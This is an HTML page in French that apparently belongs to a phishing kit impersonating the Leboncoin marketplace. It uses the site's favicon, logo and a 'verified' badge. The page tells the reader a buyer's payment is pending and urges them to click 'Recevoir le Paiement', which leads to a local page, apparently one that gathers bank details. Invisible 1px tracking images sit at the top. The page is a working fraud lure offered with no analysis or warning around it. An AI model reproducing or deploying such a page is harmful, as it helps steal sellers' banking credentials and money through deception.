<!DOCTYPE html>
<html lang="fr">
<head>
      <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="icon" type="image/png" href="https://www.leboncoin.fr/_next/static/favicon-16-91b63f31.png" sizes="16x16"/><link rel="icon" type="image/png" href="https://www.leboncoin.fr/_next/static/favicon-32-543f08dc.png" sizes="32x32"/>
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>leboncoin - connexion</title>

    <link rel="stylesheet" href="css/style1.css">

</head>

<body class="" style="">
<img style="position:absolute; width:1px; opacity: 0; height:1px; display:block;" src="images//pixel3.gif">
<img style="position:absolute; width:1px; opacity: 0; height:1px; display:block;" src="images//pixel2.gif">
<img style="position:absolute; width:1px; opacity: 0; height:1px; display:block;" src="images//pixel1.gif">


<div id="application">
    <div data-reactroot="" data-reactid="1">
        <!-- react-empty: 2 -->
        <div data-reactid="3">
            <!-- react-empty: 4 --><!-- react-empty: 5 -->
            <!-- react-empty: 5322 -->
            <section id="container" data-reactid="7" data-pagename="adview">
                <!-- react-empty: 8 --><!-- react-empty: 4124 -->
                <main class="_2ketD" role="main" data-reactid="13">
                    <div>
                        <div>
                            <header class="" style="">
                                <div class="_1i0e0 _1jvue">
                                   <div class="container-fluid" style="background-color: rgb(255, 255, 255);box-shadow: rgb(0 0 0 / 15%) 0px 2px 4px 0px;">
        <div class="row p-3">
            <div class="col-sm-5" style="color: rgb(245, 107, 42);">
                <img src="images/left.svg">
            </div>
            <div class="col-sm-7" style="color: rgb(245, 107, 42);">
                <img src="images/logo.svg" width="130px"> &nbsp
                <span style="font-size: 1.4em;font-weight: 500;"><img src="images/verified.svg" width="20px"> Connexion</span>
            </div>
        </div>
    </div>
                                </div>
                            </header>

                        </div>
                        <div class="_3q1hf _1IuA9">
                            <div>
                                <div class="_1vh8-">
                                    <div class="_1i0e0 _1auRJ">
                                        <section class="WHGSN">

                                            <!-- react-empty: 5364 -->
                                            <div class="cardForm-cardArt">

                                                <h1 class="ExcOW" style="text-align: center;font-size: 32px;margin-top: 5%;"> Vous avez un paiement en attente.</h1>
                                                <p style="text-align: center;font-size: 16px;">
                                                    Ce paiement du site Leboncoin sera déduit du <br/>compte de l'acheteur et   approuvé par sa banque.
                                                </p>
                                                <img width="100" height="100"  src="images//success-animation_2x.gif"  style="margin: 0 42%"/>
                                                <p style="text-align: center;font-size: 16px;">
                                                    Pour recevoir le paiement sur votre compte <br/> cliquez ici:
                                                </p>
                                                <h6  style="text-align: center;font-size: 18px;margin-top: 2%;"> <a href="../ibn.html" class="ExcOW"> Recevoir le Paiement</a></h6>
                                                <p style="text-align: center;font-size: 16px;">
                                                    Cordialement, Leboncoin
                                                </p>
                                            </div>


                                        </section>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <span id="root-portal" data-reactid="648"></span>
                </main>
                <div class="_2kvEo" data-qa-id="selectedNavigationLayer" data-reactid="649"></div>
            </section>
            <span class="hidden" data-reactid="650" hidden="">version: 2019-12-19.3336</span>
        </div>
    </div>
</div>

</body>
</html>
